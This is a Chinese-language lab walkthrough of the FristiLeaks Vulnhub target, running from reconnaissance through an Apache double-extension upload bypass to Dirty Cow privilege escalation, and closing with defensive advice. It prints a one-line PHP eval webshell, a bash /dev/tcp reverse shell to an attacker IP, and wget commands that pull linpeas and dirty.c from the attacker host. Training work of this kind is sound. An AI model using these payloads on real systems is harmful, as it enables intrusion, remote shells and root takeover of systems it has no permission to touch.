Vulnhub-FristiLeaks 靶机渗透测试教学文档<\/h1>

靶机环境准备<\/h2>

下载与安装<\/strong>：<\/p>

从Vulnhub下载FristiLeaks靶机镜像<\/li>
使用VMware打开该镜像<\/li> <\/ul> <\/li>

网络配置<\/strong>：<\/p>

网络模式设置为NAT<\/li>
在高级设置中将MAC地址修改为：08:00:27:A5:A6:76<\/code><\/li> <\/ul> <\/li> <\/ol> 信息收集阶段<\/h2> 确定靶机IP<\/strong>：<\/p> 靶机启动后会自动显示IP地址<\/li> 或使用netdiscover<\/code>等工具扫描局域网<\/li> <\/ul> <\/li> 端口扫描<\/strong>：<\/p> nmap -sV -p- <靶机IP> <\/span><\/span><\/code><\/pre> 发现仅开放80端口(HTTP服务)<\/li> <\/ul> <\/li> 目录枚举<\/strong>：<\/p> 使用dirb扫描web目录：<\/li> <\/ul> dirb http:\/\/<靶机IP> <\/span><\/span><\/code><\/pre> 发现\/robots.txt<\/code>文件<\/li> 访问显示目录无有效信息<\/li> <\/ul> <\/li> 源码分析<\/strong>：<\/p> 检查网页源代码<\/li> 发现多处提到"fristi"关键词<\/li> 尝试访问\/fristi<\/code>目录<\/li> <\/ul> <\/li> <\/ol> Web应用渗透<\/h2> 登录页面分析<\/strong>：<\/p> \/fristi<\/code>目录下发现登录框<\/li> 初步猜测可能存在SQL注入漏洞<\/li> <\/ul> <\/li> SQL注入测试<\/strong>：<\/p> 使用sqlmap测试：<\/li> <\/ul> sqlmap -r test.txt --level=<\/span>5<\/span> --risk=<\/span>3<\/span> <\/span><\/span><\/code><\/pre> 测试结果显示不存在SQL注入<\/li> <\/ul> <\/li> 隐藏信息发现<\/strong>：<\/p> 检查页面源码发现提示信息<\/li> 发现被注释的base64编码字符串<\/li> 解码后得到一张图片<\/li> <\/ul> <\/li> 凭据获取<\/strong>：<\/p> 根据提示，用户名可能是eezeepz<\/code><\/li> 密码为图片内容(需人工识别)<\/li> 使用获取的凭据成功登录<\/li> <\/ul> <\/li> <\/ol> 获取初始访问权限<\/h2> 文件上传漏洞利用<\/strong>：<\/p> 登录后发现文件上传功能<\/li> 限制上传.jpg<\/code>, .png<\/code>, .gif<\/code>后缀<\/li> <\/ul> <\/li> Apache解析漏洞<\/strong>：<\/p> 使用Wappalyzer识别Apache版本为2.2.15<\/li> 该版本存在文件后缀名解析漏洞<\/li> 上传.php.jpg<\/code>文件会被解析为PHP<\/li> <\/ul> <\/li> 上传Webshell<\/strong>：<\/p> 上传一句话木马：<\/li> <\/ul> <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['epoch'<\/span>]); ?><\/span> <\/span><\/span><\/span><\/code><\/pre> 使用蚁剑等工具连接Webshell<\/li> <\/ul> <\/li> 反弹Shell<\/strong>：<\/p> 通过Webshell执行反弹命令：<\/li> <\/ul> bash -i >& \/dev\/tcp\/<攻击机IP>\/7777 0>&1<\/span> <\/span><\/span><\/code><\/pre> 在攻击机监听：<\/li> <\/ul> nc -lvnp 7777<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 权限提升<\/h2> 改善Shell环境<\/strong>：<\/p> python -c "import pty;pty.spawn('\/bin\/bash')"<\/span> <\/span><\/span><\/code><\/pre><\/li> 系统信息收集<\/strong>：<\/p> 下载并运行Linux提权检查脚本：<\/li> <\/ul> wget http:\/\/<攻击机IP>\/linpeas.sh -O \/tmp\/linpeas.sh <\/span><\/span>chmod +x \/tmp\/linpeas.sh <\/span><\/span>\/tmp\/linpeas.sh <\/span><\/span><\/code><\/pre><\/li> 脏牛(Dirty Cow)漏洞利用<\/strong>：<\/p> 识别系统存在CVE-2016-5195漏洞<\/li> 下载漏洞利用代码：<\/li> <\/ul> wget http:\/\/<攻击机IP>\/dirty.c -O \/tmp\/dirty.c <\/span><\/span><\/code><\/pre> 编译并执行：<\/li> <\/ul> gcc -pthread dirty.c -o dirty -lcrypt <\/span><\/span>chmod +x .\/dirty <\/span><\/span>.\/dirty mypassword <\/span><\/span><\/code><\/pre> 创建具有root权限的firefart<\/code>用户<\/li> <\/ul> <\/li> 获取Flag<\/strong>：<\/p> su firefart <\/span><\/span>cd \/root <\/span><\/span>cat flag.txt <\/span><\/span><\/code><\/pre><\/li> <\/ol> 总结与关键点<\/h2> 关键渗透路径<\/strong>：<\/p> 发现隐藏的\/fristi<\/code>目录<\/li> 通过源码分析获取凭据<\/li> 利用Apache解析漏洞上传Webshell<\/li> 使用Dirty Cow漏洞提权<\/li> <\/ul> <\/li> 技术要点<\/strong>：<\/p> Apache 2.2.15的文件解析漏洞<\/li> 反弹Shell的多种方法<\/li> Dirty Cow本地提权漏洞利用<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> 及时更新Web服务器软件<\/li> 严格限制文件上传功能<\/li> 定期更新操作系统内核<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> 学习价值<\/strong>：<\/p> 信息收集与源码分析能力<\/li> 文件上传漏洞的多种绕过方法<\/li> 从Web渗透到系统提权的完整流程<\/li> <\/ul> <\/li> <\/ol>